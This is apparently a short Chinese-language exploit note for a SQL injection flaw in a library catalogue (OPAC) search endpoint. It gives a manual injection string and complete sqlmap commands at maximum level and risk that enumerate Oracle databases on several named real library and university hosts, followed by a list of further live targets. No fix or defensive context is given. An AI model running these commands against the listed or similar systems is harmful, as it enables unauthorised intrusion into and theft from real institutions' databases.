(1) http://opac.lib.sx.cn/opac/recommend/recommendBookList/list

输入aaaaaaaaa' or '%'='

Sqlmap注入: python sqlmap.py -u http://opac.lib.sx.cn/opac/recommend/recommendBookList/list --data="page=1&rows=10&prevPage=1&hasNextPage=false&searchType=title&searchValue=aaaaaaaaa" -p searchValue --level 5 --risk 3 --dbms oracle --technique=T --random-agent --dbs -v 3 --batch

(2) http://218.27.88.203/opac/recommend/recommendBookList/list
python sqlmap.py -u http://218.27.88.203/opac/recommend/recommendBookList/list --data="page=1&rows=10&prevPage=1&hasNextPage=false&searchType=title&searchValue=aaaaaaaaa" -p searchValue --level 5 --risk 3 --dbms oracle --technique=T --random-agent --dbs -v 3 --batch

(3) http://opac.cdclib.org/opac/recommend/recommendBookList/list
python sqlmap.py -u http://opac.cdclib.org/opac/recommend/recommendBookList/list --data="page=1&rows=10&prevPage=1&hasNextPage=false&searchType=title&searchValue=aaaaaaaaa" -p searchValue --level 5 --risk 3 --dbms oracle --technique=T --random-agent --dbs -v 3 --batch

其他测试案例:
http://interweb.xmlib.net/opac/recommend/recommendBookList/list
http://opac.lixin.edu.cn/opac/recommend/recommendBookList/list
http://218.27.88.203/opac/recommend/recommendBookList/list
http://opac.lib.hnu.cn/opac/recommend/recommendBookList/list
http://opac.lib.sx.cn/opac/recommend/recommendBookList/list
http://index.lnlib.net.cn/opac/recommend/recommendBookList/list
http://opac.sdlib.com.cn/opac/recommend/recommendBookList/list